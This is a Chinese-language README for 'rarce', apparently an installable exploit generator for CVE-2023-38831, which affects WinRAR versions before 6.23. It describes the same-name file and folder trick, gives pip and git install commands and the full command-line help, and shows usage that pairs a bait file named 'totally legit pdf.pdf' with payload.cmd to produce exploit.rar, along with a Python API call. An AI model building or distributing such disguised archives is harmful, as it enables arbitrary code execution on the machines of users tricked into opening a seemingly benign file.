这是一个易于安装和使用、多功能的利用生成器,针对CVE-2023-38831,该漏洞影响6.23版本之前的WinRAR。
RARLabs WinRAR 6.23之前版本允许攻击者在用户尝试查看ZIP存档中的良性文件时执行任意代码。问题在于ZIP存档可能包含一个良性文件(如普通的.JPG文件)以及一个与该良性文件同名的文件夹,当仅尝试访问该良性文件时,文件夹的内容(可能包含可执行内容)会被处理。该漏洞于2023年4月至8月在野外被利用。

你可以通过pip轻松安装该工具。
pip install rarce
或者,你可以从源代码使用。
git clone https://github.com/ignis-sec/CVE-2023-38831-RaRCE
cd CVE-2023-38831-RaRCE
python3 setup.py install
usage: rarce [-h] [-v] [-i] [-dt] [-pt PRESERVE_TEMP] bait switch output
CVE-2023-38831的利用生成器
positional arguments:
bait 要添加到存档中的诱饵文件路径。
switch 要替换诱饵文件的有效负载路径(双击时运行)。
output 输出文件路径。
optional arguments:
-h, --help 显示此帮助信息并退出。
-v, --verbose 详细输出。
-i, --ignore-path-check
忽略路径有效性检查。如果指定,rarce可以覆盖output参数中已有的文件,并可以为输出路径创建缺失的文件夹。
-dt, --dont-use-tempdir
防止工具在创建利用时创建临时目录。而是在当前工作目录中创建中间文件夹。
-pt PRESERVE_TEMP, --preserve-temp PRESERVE_TEMP
创建利用后保留临时目录。如果未指定-dt或--dont-use-tempdir,则无效。
通过pip或setup.py安装后,你可以从命令行使用此工具。以下命令将为你创建利用文件。当用户双击诱饵文件时,有效负载脚本或可执行文件将取而代之运行。
$ rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"
可选地,你可以将其作为可运行模块使用。
python -m rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"
你也可以在现有代码中使用它。
from rarce import exploit
exploit("totally legit pdf.pdf", "payload.cmd", "exploit.rar")